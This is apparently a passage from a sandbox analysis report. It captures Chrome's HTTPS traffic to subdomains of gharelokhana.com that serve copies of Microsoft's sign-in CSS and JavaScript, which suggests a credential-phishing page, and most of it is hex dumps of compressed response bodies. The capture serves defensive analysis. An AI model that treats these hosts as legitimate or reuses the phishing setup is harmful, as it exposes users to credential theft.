                                                                                                                                                                                                2024-12-05 07:24:43 UTC16384INData Raw: e3 6c 23 b5 1d 0e 69 61 37 17 51 dd f8 d2 ad 3b 6b 63 49 92 f7 c0 49 77 73 33 f7 a1 96 bd 33 10 56 4c 94 b9 9e d6 ec c8 1e aa b8 ba b5 8f 65 ce e3 7f 74 8a 5c 08 48 6a 0b fc cc 4b be b8 3c 16 c3 b5 8a 27 bc 5e 86 e9 86 93 35 24 1c 31 41 9d 48 14 ae 1c a7 25 f3 57 51 2e 6c 2e 37 f9 6c c0 c9 53 6d ae 64 9a b8 5e 58 70 f6 dc 8b 28 19 4a fb d7 7f b7 74 e9 25 49 78 30 e4 50 50 d0 a3 cd e4 0c a3 32 e4 f2 55 30 18 55 e9 5e b0 c5 de 3f 83 93 ff 50 39 0e 0b 28 36 b2 ea f9 37 96 73 66 b9 02 a4 f2 ac 05 29 a7 c8 f6 9e 5f 1c f1 c3 63 cf 95 1c df f6 ce b7 04 ff 14 21 fc 26 3c df 45 28 f2 33 e2 15 10 1d a7 a3 6b 01 6a ac be ef ae 22 5c 1f 88 bf 82 3f d4 9c 55 7c 5b 7b 56 31 37 a8 96 9d d9 4a 52 8a cf b3 2e 18 31 79 7d af 47 ce 43 79 bd 61 8c a3 76 9c 8a 05 68 45 04 31
                                                                                                                                                                                                Data Ascii: l#ia7Q;kcIIws33VLet\HjK<'^5$1AH%WQ.l.7lSmd^Xp(Jt%Ix0PP2U0U^?P9(67sf)_c!&<E(3kj"\?U|[{V17JR.1y}GCyavhE1
                                                                                                                                                                                                2024-12-05 07:24:43 UTC3477INData Raw: ab ef f6 f6 64 5b 49 b3 a0 f7 ca 1b 7e be 59 c9 d4 56 76 67 53 8a ad 4a 00 a0 70 fe 72 78 82 32 c4 12 25 cd a2 ef d3 6f 89 56 3b 6a b8 46 c2 6d 8c 76 77 47 af 8a 91 b6 bd 09 a4 b9 d0 51 47 03 d5 d7 0a ff ab 96 35 e1 84 54 d7 de de 3e 2a 53 cb 64 a4 94 8e 45 07 7f 5e 0e 4a 29 ff 00 e5 99 b2 d3 01 69 17 12 45 49 a8 fb fa 63 f4 70 6f 8f 25 45 5a 43 76 39 ee 7b a9 4a 53 5d ef 99 ad 00 30 0d 3f 19 e9 31 91 66 6c d4 10 44 d7 ac 94 cc fc 0b c5 9e c7 7e 92 ce d6 86 5b 77 5c 5a 06 23 f9 34 b3 78 f2 73 ec 78 23 7a d0 1a 68 61 01 ed 3b 3e 15 9e 9f bf c3 42 0c 81 64 53 3d a7 25 bb 84 27 b8 11 3e da 44 8b a7 98 da d7 1c a6 dc 48 c5 e8 64 8c 19 59 f2 3a 09 57 3e 20 66 f0 6b 68 11 29 51 d0 3e 60 ac 73 25 b2 9e f8 2a 82 dd ba e5 61 03 e5 11 63 db 36 3d f0 10 7c 2c 52 3c
                                                                                                                                                                                                Data Ascii: d[I~YVvgSJprx2%oV;jFmvwGQG5T>*SdE^J)iEIcpo%EZCv9{JS]0?1flD~[w\Z#4xsx#zha;>BdS=%'>DHdY:W> fkh)Q>`s%*ac6=|,R<


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                14192.168.2.849752164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:44 UTC445OUTOPTIONS /api/report?catId=GW+estsfd+SEC HTTP/1.1
                                                                                                                                                                                                Host: 43042841-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:45 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:44 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                access-control-allow-headers: content-type
                                                                                                                                                                                                access-control-allow-credentials: false
                                                                                                                                                                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                2024-12-05 07:24:45 UTC12INData Raw: 37 0d 0a 4f 50 54 49 4f 4e 53 0d 0a
                                                                                                                                                                                                Data Ascii: 7OPTIONS
                                                                                                                                                                                                2024-12-05 07:24:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                15192.168.2.849756164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:44 UTC688OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:46 UTC796INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:45 GMT
                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                Content-Length: 20400
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 25 Sep 2024 21:42:27 GMT
                                                                                                                                                                                                etag: 0x8DCDDAAF34D1A25
                                                                                                                                                                                                x-ms-request-id: 8db99a76-d01e-0047-679b-46a80d000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072445Z-15d6f6465c8dk6rvhC1DUSu8gc00000000tg00000000bxdm
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:46 UTC15588INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2
                                                                                                                                                                                                Data Ascii: }k6wRJH=GSIx9}T*)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}|#xAg*O|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
                                                                                                                                                                                                2024-12-05 07:24:46 UTC4812INData Raw: 75 4c ff b4 b4 67 78 ce 2b 2b 6e 13 d6 17 0b 8b ca ba c2 a2 2a 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66
                                                                                                                                                                                                Data Ascii: uLgx++n*,1/*+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                16192.168.2.849757164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:44 UTC665OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:46 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:46 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 122350
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 23 Oct 2024 19:33:27 GMT
                                                                                                                                                                                                etag: 0x8DCF399919435D9
                                                                                                                                                                                                x-ms-request-id: 46e4175b-801e-0020-5a8c-46cf4e000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072445Z-15d6f6465c8jqpbxhC1DUSr4uw00000000y000000000tms5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:46 UTC15577INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 57 e3 b8 b2 38 fa ff fd 14 c1 7b 5f 26 19 4c 3a ce 8b c4 b4 87 13 02 74 b3 07 08 43 a0 67 f6 a1 d9 2c c7 56 82 07 c7 ce b1 1d 1e 3b e4 7c f6 5f 55 49 b2 e5 c4 a1 bb e7 9c 75 ef ba eb ee 47 13 4b a5 57 a9 54 aa 2a 95 4a 1f 7e de fa bf 4a 3f 97 76 bf ff 3f a5 e1 75 ef ea ba 34 38 29 5d 7f 3e bd 3a 2a 5d c2 d7 3f 4b 17 83 eb d3 fe f1 f7 d7 83 8d e2 ff af 1f bc b8 34 f6 7c 56 82 bf 23 3b 66 6e 29 0c 4a 61 54 f2 02 27 8c 66 61 64 27 2c 2e 4d e1 df c8 b3 fd d2 38 0a a7 a5 e4 81 95 66 51 f8 27 73 92 b8 e4 7b 71 02 85 46 cc 0f 9f 4b 65 a8 2e 72 4b 97 76 94 bc 96 4e 2f 2b 55 a8 9f 41 6d de c4 0b a0 b4 13 ce 5e e1 f7 43 52 0a c2 c4 73 58 c9 0e 5c aa cd 87 8f 20 66 a5 79 e0 b2 a8 f4 fc e0 39 0f a5 73 cf 89 c2 38 1c 27 a5 88 39
                                                                                                                                                                                                Data Ascii: {W8{_&L:tCg,V;|_UIuGKWT*J~J?v?u48)]>:*]?K4|V#;fn)JaT'fad',.M8fQ's{qFKe.rKvN/+UAm^CRsX\ fy9s8'9
                                                                                                                                                                                                2024-12-05 07:24:46 UTC14460INData Raw: ac 14 df 6c ed 40 25 12 b0 c7 b7 08 6b 4d 3c 80 35 07 c2 4a aa 54 db 4a ed d6 56 4d b7 ab 0c 7d 21 30 f6 cc 77 aa 82 a0 91 48 c1 3b 2b 6b 79 a0 25 00 07 7e c2 e3 85 72 45 48 dd e5 45 c0 2f fb 6b b6 ff 6c bf c6 da b2 02 0d e2 6e 00 e3 1d cc b0 43 31 e0 c5 26 2e e3 44 de 28 df 7f a5 fe 0c a2 9c 09 b4 80 02 90 7e ca fc 84 3a e1 4e 06 65 b5 d0 8c b1 c7 32 57 5e 71 c2 d0 42 36 9d e1 a5 19 ee 00 62 15 ed 39 c0 53 00 70 90 0d 86 65 15 56 be 61 72 da cf ec 1b 9e 74 90 7e 6f da 74 34 01 18 68 02 10 2a 3f 48 df e2 1e 76 36 63 f1 4a 39 d4 df d1 47 04 14 a6 23 3b 7a cc 22 26 ec 7b 2b 9e 6f 87 e8 8f 45 be 84 78 11 64 35 f7 77 f4 cb 52 72 d7 ea b3 6c 14 9b d0 d3 98 6e cf 5c e0 4d 73 d8 43 aa 2e 40 65 29 89 ae d0 2d ac f1 68 83 fb 1d b3 a2 6a 91 9b 23 9a 45 37 f7 5b f8
                                                                                                                                                                                                Data Ascii: l@%kM<5JTJVM}!0wH;+ky%~rEHE/klnC1&.D(~:Ne2W^qB6b9SpeVart~ot4h*?Hv6cJ9G#;z"&{+oExd5wRrln\MsC.@e)-hj#E7[
                                                                                                                                                                                                2024-12-05 07:24:46 UTC16384INData Raw: c3 34 73 86 c0 a7 21 c3 03 1c d2 0e 81 69 1e a8 e3 d4 ff 3d ea 3e 06 f2 a5 a7 65 74 61 44 3f 64 03 d2 85 ec 8c c7 48 19 dc 44 0f 90 03 55 2a 93 34 cb f8 84 d9 0b c6 b8 5e c4 eb 99 57 5f 18 5c c9 a4 ab 81 ff 4a 4d f9 dd 3c ca 7d ed 7b 2d ab b0 63 1b b1 1d db 8c 62 fc 41 c6 0f 51 1e a0 57 96 3f 45 bd e3 9e 96 d2 35 1f 3d d4 f1 92 5f 8d 79 f2 c2 71 5c 89 42 67 df b9 3d f7 0a 29 60 bc 8f 16 de 2e 2e be 83 39 b8 69 e2 88 ba 6f fc 82 d5 c0 35 7b e0 4f 9b 25 e2 97 18 19 fb 57 f7 13 14 81 14 1b c6 41 58 99 13 08 21 42 f8 8a d5 35 a7 b3 83 94 02 c7 d2 3e 49 4d 3c 61 5b 60 75 4c a2 0a 6d 54 20 c8 21 3d 18 11 39 48 26 7e 30 42 f3 72 09 aa 31 6a de c2 0e 08 86 84 44 f8 7c 88 04 77 57 f4 62 6d a5 da 8b dc 5e db 66 c0 a3 5d c6 02 db 03 6a 48 ca 08 ec e3 c8 7d 5b 6d b6
                                                                                                                                                                                                Data Ascii: 4s!i=>etaD?dHDU*4^W_\JM<}{-cbAQW?E5=_yq\Bg=)`..9io5{O%WAX!B5>IM<a[`uLmT !=9H&~0Br1jD|wWbm^f]jH}[m
                                                                                                                                                                                                2024-12-05 07:24:46 UTC16384INData Raw: cd 7a c0 aa 0b ce b0 53 7d ff 21 18 f3 bb 0f 35 f5 9c c0 01 b9 33 1a 71 86 a3 9a 0c 0c 42 83 de af 9c e7 c4 1c 0b 25 a9 14 0d dc 2b bd a6 d5 c0 77 d3 f1 84 85 41 62 c8 cc 8c 2c 93 e6 57 fc db 78 3d a0 9d 7e c0 db 3e fc 1c e7 d7 18 90 ec 24 95 43 fc b3 39 2e 70 2d c1 fc dc f2 f9 20 26 c1 cc c1 47 84 1a 9a 77 66 6b c6 51 74 73 ac 4c e0 39 4b cf 2c 00 f7 1a b6 81 5f 1e 9b cd a5 db a1 78 7b 64 be ad 33 02 e5 8c bb 46 3e 75 60 16 25 5d 9b 8d 98 90 51 04 cf 8b 59 47 9e 0e 87 a3 68 3f bd c5 b9 d9 cb b2 3d 24 82 39 e7 1b 73 96 0d e6 93 32 bc 35 33 4c 93 af 93 60 5c 1e 8e 41 cd 70 1a 7b e2 c4 5c 4b 21 d9 04 9a 6b e9 c8 1c 75 dc b0 30 f7 7b 6c 6b 2e 46 44 b5 85 5a a1 ea 96 57 ae a6 c2 43 9e 1d 48 f5 39 6f 6a 3c 82 09 b9 12 65 7f 18 42 4c 0a 93 4a d1 a2 ab 8e ea 89
                                                                                                                                                                                                Data Ascii: zS}!53qB%+wAb,Wx=~>$C9.p- &GwfkQtsL9K,_x{d3F>u`%]QYGh?=$9s253L`\Ap{\K!ku0{lk.FDZWCH9oj<eBLJ
                                                                                                                                                                                                2024-12-05 07:24:46 UTC16384INData Raw: de 33 e2 05 5b 30 1d 05 9a 67 8f b1 1e 4d bf 41 3f 66 3e d0 47 c1 96 8b a3 17 bc b1 fe 6e b5 4a 79 2d 20 eb 04 f4 37 c9 34 36 9e 34 b6 eb 6e a7 d7 44 2d d9 22 a7 6e 2a 07 26 b5 94 13 88 7c 3f f3 16 41 a3 a2 c8 16 4d b3 6a 21 28 fa 08 09 18 69 74 9a a4 70 4a 5d 09 f0 24 7b fa 34 53 04 54 8b 8b 10 0d 06 6e b6 54 b3 a8 d5 27 31 bb d0 fa d9 c3 43 c4 27 8e 7c 19 7a 06 69 2b cc 0a ba 20 ec b4 b5 fa bf 2c 3b c2 b7 a9 bb 01 8c 08 34 eb 14 2c 67 1e 7b c8 66 ee f4 cf 08 96 dd 15 75 54 a3 c0 db 19 0a e1 de f6 e8 81 27 e4 e3 e2 a9 4c a5 a6 53 09 82 d6 bf d6 73 c5 4f 42 22 a4 29 27 83 55 12 23 fc 93 a7 d1 1d d4 0f ab ec d2 67 df c5 82 81 2d 32 11 7d 4d fd 11 57 a4 25 97 cb 64 3c 8e d3 47 1c 58 54 43 ff 94 07 8b cd 16 75 db f6 2c 07 6c cb 42 cf 12 17 1b fa ad 54 d7 a9
                                                                                                                                                                                                Data Ascii: 3[0gMA?f>GnJy- 7464nD-"n*&|?AMj!(itpJ]${4STnT'1C'|zi+ ,;4,g{fuT'LSsOB")'U#g-2}MW%d<GXTCu,lBT
                                                                                                                                                                                                2024-12-05 07:24:46 UTC2731INData Raw: 8b d9 7c 53 cb a3 0f 42 1d 1c dd a3 e6 57 2c fc 9e c2 cb ac 2a ad 74 4b 43 aa 3b b2 36 44 82 f6 95 bd 1c 59 34 b3 2b 3b dc 68 ff bb c9 87 fa d2 b7 03 79 59 07 8f 0a 55 31 ad 65 db 64 73 d3 26 d7 ce b5 03 dd 6a 72 5f 5e 76 b7 a6 13 5a df dd bd fb dd f2 1e ba cb fe c3 e9 da 3b d2 7a 61 12 1a 5e 91 0d 71 64 9d d1 f1 86 7f 4d 1e 76 6e d6 3e 9b 41 01 60 42 34 87 dc 8f 50 92 6c dd 1f e8 ad ca 31 d5 7c 3a b6 06 67 10 e8 b0 85 06 d6 bf 67 cb 2c 89 fd be 90 c3 e1 d5 69 16 17 d6 ff b5 9e 8d 1b f3 6a 64 fd cf e4 07 0a 80 7b 73 72 74 76 d2 8a 27 b5 fe af 54 b7 81 60 f1 c4 48 07 20 e9 9b 4f c1 6f 7e 56 1a d3 39 5a 7b 31 ae 4f 29 2d ef 1c ea 5c b8 f3 b1 29 40 37 98 d2 ae 19 de 1c 55 4f 55 64 92 d2 6f f5 78 28 b7 f1 a9 bc 7f 8a b5 a1 3d e4 e1 c0 1a 8c 28 ab 67 b6 9a 01
                                                                                                                                                                                                Data Ascii: |SBW,*tKC;6DY4+;hyYU1eds&jr_^vZ;za^qdMvn>A`B4Pl1|:gg,ijd{srtv'T`H Oo~V9Z{1O)-\)@7UOUdox(=(g
                                                                                                                                                                                                2024-12-05 07:24:46 UTC16384INData Raw: ec a6 b3 d4 81 58 f0 32 a8 12 11 17 e0 e0 b6 60 0c 96 40 10 92 ca 02 3d f9 76 5b 31 ab dd 18 cd 28 49 60 b1 7a 30 61 62 e1 27 cc 73 05 4f 24 97 9e 9d 87 21 09 c9 dd d0 93 9f da a0 d1 98 65 79 80 35 b1 03 08 26 97 b3 c4 f7 49 7b 0e 21 d8 77 33 75 46 33 ca 02 90 4f 2e fd d8 06 1b f7 22 db f1 63 87 61 36 c1 62 85 6d bb 3b e1 e4 6e 90 ba ae 80 cc cb c9 2c 74 ec 04 92 dc 65 c2 f1 9d 18 f2 3d f6 a3 24 da 49 37 46 33 4a 44 10 c5 8e 1d 7a 6e ec db 36 0d cc ce ec 00 8a 0b 31 f5 f0 96 fb 73 6b 9d c1 22 74 98 1d c7 be 48 b8 0f fd 5c 82 f3 09 9e 65 0c f6 00 f3 b9 b8 dd de e9 6a 37 46 33 e2 32 90 99 cd a0 18 31 16 f9 1e 70 90 db 6e 02 55 22 72 33 11 27 3b d1 8c dc 28 f5 43 18 16 21 cb 13 11 03 c9 a5 10 4e 0c 9b 29 cc 30 91 3c c8 e2 dd 8c c9 68 46 22 0c dc 88 65 71 e0
                                                                                                                                                                                                Data Ascii: X2`@=v[1(I`z0ab'sO$!ey5&I{!w3uF3O."ca6bm;n,te=$I7F3JDzn61sk"tH\ej7F321pnU"r3';(C!N)0<hF"eq
                                                                                                                                                                                                2024-12-05 07:24:46 UTC16384INData Raw: b1 f9 fb 9f 75 3e 8d b6 3f f9 f3 72 fc 9a d7 73 0d c4 3e 57 50 ec bf 69 c0 f8 cc 12 80 b2 72 ac 8e fc 41 9d b1 a3 1d 77 b1 b1 d8 ef be fb f0 25 20 ce d3 53 ba f3 a9 a8 d8 59 56 9c 5c 74 d1 e5 fa b6 15 35 b2 2f 3a ad fc 87 ec 30 4c 4b be ae 8b 9b 97 1b 8d a5 df 29 ca fb bf 73 bf ec 87 b7 0c 8c 8e 2e 52 fc 8c 4e 82 e9 5b 46 9c 8c 7a f9 cc 98 fc 99 b4 ca cf 1a 56 b3 fb 45 05 39 6c cb 85 a0 e5 7c f9 3c 68 8b 80 71 66 da af ad 9c 76 a4 38 be 2d 27 f0 2a bb e7 36 fa e8 ee f8 d9 b5 75 d4 4f d7 7f aa 12 6d af 59 46 bd 25 3e fb ee 8d 90 d5 eb 45 79 7e 5c 95 8f df 49 7e b1 58 f1 0a ad 7f fe 74 3b 3a ff f6 a6 66 f4 d7 cf c4 ff 3f 0b 75 9b c6 6f 47 d7 06 ec cf 4d d1 5f 14 7e b6 cb d6 37 d8 6c 6c ab fe fe 67 c4 88 e3 73 29 45 76 71 76 be 73 71 de c1 9c ca 74 f3 05 ca
                                                                                                                                                                                                Data Ascii: u>?rs>WPirAw% SYV\t5/:0LK)s.RN[FzVE9l|<hqfv8-'*6uOmYF%>Ey~\I~Xt;:f?uoGM_~7llgs)Evqvsqt
                                                                                                                                                                                                2024-12-05 07:24:46 UTC7662INData Raw: 0f 43 0f 01 8d 06 1c 40 10 5c a1 cf da 2f a2 c3 5f 88 83 23 40 8a 64 db 1a 4c 35 8d dc 68 ae 7d 23 8d f5 f9 8b b3 13 10 b1 ae 62 c6 4d 7f 44 f0 fd ae fd 46 a6 5f ee b4 7f 70 5b dd ef 04 cf 94 7f e2 bf fe 4e df fd 93 fe fb 2f 32 0d 7a 51 06 56 4c 2f a5 fd bb f4 ec 55 b7 87 5e 3c a1 d7 f9 92 ed da ef 68 ce b2 fd f8 ae 9b 0b 0e 84 3b f1 b3 f3 d1 ce 8f e4 a9 6c e0 e4 a7 a6 21 f9 d4 f2 a4 b4 55 54 a4 b3 43 4c 5d 75 c0 24 bb 2f a7 20 1e 82 78 34 e7 ac 61 ff ef da 0b d1 ed fe bf f1 6a d7 01 79 f2 a4 13 f4 8e ae d1 12 35 9f 02 cf c4 56 fd ce 17 b7 c0 e6 f7 63 72 d7 ed fd 3d 81 5e be 00 46 ef ff ae d1 83 96 13 6f ff bc 77 cc be 25 28 64 cd 8a fb e3 9d 16 a0 a0 a9 d9 3d ee 21 c4 c7 c1 53 6e 75 f1 64 18 26 b4 7f bf c9 2d 96 31 9e a6 ef 13 cd 2f 4c 4a 5b 16 d8 a3 b7
                                                                                                                                                                                                Data Ascii: C@\/_#@dL5h}#bMDF_p[N/2zQVL/U^<h;l!UTCL]u$/ x4ajy5Vcr=^Fow%(d=!Snud&-1/LJ[


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                17192.168.2.849758164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:44 UTC684OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:46 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:45 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 16345
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                                                                                                                                                                etag: 0x8DCF55E3D91C34E
                                                                                                                                                                                                x-ms-request-id: 06e3c3c4-301e-0047-439b-46dfb2000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
